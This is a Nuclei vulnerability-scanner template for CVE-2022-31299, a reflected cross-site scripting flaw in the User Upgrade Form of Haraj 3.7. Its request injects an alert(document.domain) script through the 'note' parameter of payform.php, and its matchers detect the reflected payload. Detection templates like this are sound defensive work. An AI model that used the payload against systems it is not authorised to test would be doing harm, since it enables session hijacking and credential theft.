nuclei-templates/http/cves/2022/CVE-2022-31299.yaml

55 lines
2.0 KiB
YAML

id: CVE-2022-31299
info:
name: Haraj 3.7 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/bigzooooz/CVE-2022-31299
- https://angtech.org
- https://nvd.nist.gov/vuln/detail/CVE-2022-31299
- https://angtech.org/product/view/3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31299
cwe-id: CWE-79
epss-score: 0.00209
epss-percentile: 0.58814
cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: angtech
product: haraj
tags: cve,cve2022,haraj,xss,angtech
http:
- method: GET
path:
- "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '><script>alert(document.domain)</script></textarea>'
- 'content="nextHaraj'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022007731856229c917928912788d627e37eba5f9e489edaec9acc871fe35a56900602206f6e39e7275045f7a5c8e65751e219f743fea6c8a6ad5c32d81e9f469a194a4c:922c64590222798bb761d5b6d8e72950